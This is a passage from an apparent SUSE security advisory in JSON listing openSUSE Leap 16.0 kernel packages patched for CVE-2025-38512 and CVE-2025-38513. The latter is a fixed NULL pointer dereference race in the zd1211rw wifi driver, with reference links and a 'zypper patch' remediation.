"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38512"
},
{
"cve": "CVE-2025-38513",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38513"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: zd1211rw: Fix potential NULL pointer dereference in zd_mac_tx_to_dev()\n\nThere is a potential NULL pointer dereference in zd_mac_tx_to_dev(). For\nexample, the following is possible:\n\n \tT0\t\t\t \t\tT1\nzd_mac_tx_to_dev()\n /* len == skb_queue_len(q) */\n while (len \u003e ZD_MAC_MAX_ACK_WAITERS) {\n\n\t\t\t\t\t filter_ack()\n\t\t\t\t\t spin_lock_irqsave(\u0026q-\u003elock, flags);\n\t\t\t\t\t /* position == skb_queue_len(q) */\n\t\t\t\t\t for (i=1; i\u003cposition; i++)\n\t\t\t\t \t skb = __skb_dequeue(q)\n\n\t\t\t\t\t if (mac-\u003etype == NL80211_IFTYPE_AP)\n\t\t\t\t\t skb = __skb_dequeue(q);\n\t\t\t\t\t spin_unlock_irqrestore(\u0026q-\u003elock, flags);\n\n skb_dequeue() -\u003e NULL\n\nSince there is a small gap between checking skb queue length and skb being\nunconditionally dequeued in zd_mac_tx_to_dev(), skb_dequeue() can return NULL.\nThen the pointer is passed to zd_mac_tx_status() where it is dereferenced.\n\nIn order to avoid potential NULL pointer dereference due to situations like\nabove, check if skb is not NULL before passing it to zd_mac_tx_status().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38513",
"url": "https://www.suse.com/security/cve/CVE-2025-38513"
},
{
"category": "external",
"summary": "SUSE Bug 1248179 for CVE-2025-38513",
"url": "https://bugzilla.suse.com/1248179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
